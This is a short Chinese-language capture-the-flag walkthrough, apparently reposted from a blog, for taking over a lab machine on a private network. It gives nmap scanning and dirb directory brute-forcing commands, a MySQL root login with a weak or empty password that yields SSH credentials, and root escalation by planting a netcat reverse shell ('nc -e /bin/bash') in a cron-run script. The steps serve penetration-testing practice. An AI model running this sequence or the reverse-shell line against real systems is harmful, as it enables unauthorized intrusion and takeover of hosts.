主機發現
sudo nmap -sn 192.168.28.0/24
TCP埠掃描:sudo nmap -sT --min-rate 1000 -p- 192.168.28.34 -oA nmapscan/ports
TCP埠版本掃描sudo nmap -sT -sV -sC -O -p22,80,3306 192.168.28.34 -oA nmapscan/detail
脆弱性掃描:sudo nmap --script=vuln -p22,80,3306 192.168.28.34 -oA nmapscan/vuln
對80開放了一個info.php頁面訪問是一個phpinfo的頁面
對有waf,或者是有php組態檔的設定,不能直接形成攻擊面,
對http服務進行訪問
目錄爆破
sudo dirb -u http://xxxxx -w 字典 #并未發現有特殊的頁面,通過深度挖掘發現
sudo dirb -u http://xx -X txt,php,zip,git,rar,sql,tar - w xx
仍然什么都沒有
所以只能進行暴力破解
對于mysql和ssh爆破來說,嘗試mysql的暴力破解可能會更好一些,因為更有可能是弱口令和root的登錄名
對mysql進行弱口令,空密碼登錄
sudo mysql -h 192.168.28.34 -uroot -p
密碼root/空密碼
發現ssh資料表展開并查看
獲得ssh賬戶密碼后登錄
sudo ssh [email protected]
輸入密碼
成功getshell
權限查詢
whoami uname -a ip a sudo -l
在家目錄查詢是否有flag
ls -liah
發現有一個sh腳本, 查看任務計劃是什么權限運行cat /etc/crontab
發現是由root用戶進行,我們將sh腳本寫入一些反彈shell即刻提權
完善一下shell的互動性
輸入clear報錯
export term=xterm-color
利用各種命令(nc ,ruby,python,java,go,)進行反彈shell
寫入
#!/bin/bash
nc -e /bin/bash 192.168.28.29 1234 &
kali監聽
nc -lvnp 1234
成功geshell
在家目錄中找flag
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/551565.html
標籤:其他
上一篇:再一次,實作聽歌自由
下一篇:返回列表